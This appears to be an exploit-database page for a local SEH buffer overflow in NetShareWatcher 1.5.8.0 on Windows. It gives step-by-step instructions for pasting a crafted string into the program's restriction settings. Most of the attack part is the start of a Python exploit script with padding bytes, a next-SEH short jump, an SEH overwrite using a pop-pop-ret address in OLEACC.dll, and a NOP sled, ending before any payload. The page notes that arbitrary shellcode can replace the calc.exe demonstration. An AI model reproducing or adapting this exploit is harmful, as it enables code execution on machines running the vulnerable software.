Netsharewatcher 1.5.8.0 local seh buffer overflow Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-03-20 |
Type : local |
Platform : windows
This exploit / vulnerability Netsharewatcher 1.5.8.0 local seh buffer overflow is for educational purposes only and if it is used you will do on your own risk!
# 1- Run python code : NetShareWatcher.py
# 2- Open Exploit.txt and copy content to clipboard
# 3- Open NetShareWatcher
# 4- Setting --> Defaults --> Restrictions --> Add --> Custome
# 5- Paste the content of Exploit.txt into the box
# 6- Click 'Find'
# 7- Calc.exe Open ( Can be replaced with Shellcode )
#!/usr/bin/python
buffer = "\x41" * 262
nseh = "\xeb\x14\x90\x90" # Overwrite Next Seh With Short jmp
seh = "\x90\xBF\xC9\x74" # Overwrite Seh / pop esi pop ebx retn [OLEACC.dll]
nops = "\x90" * 20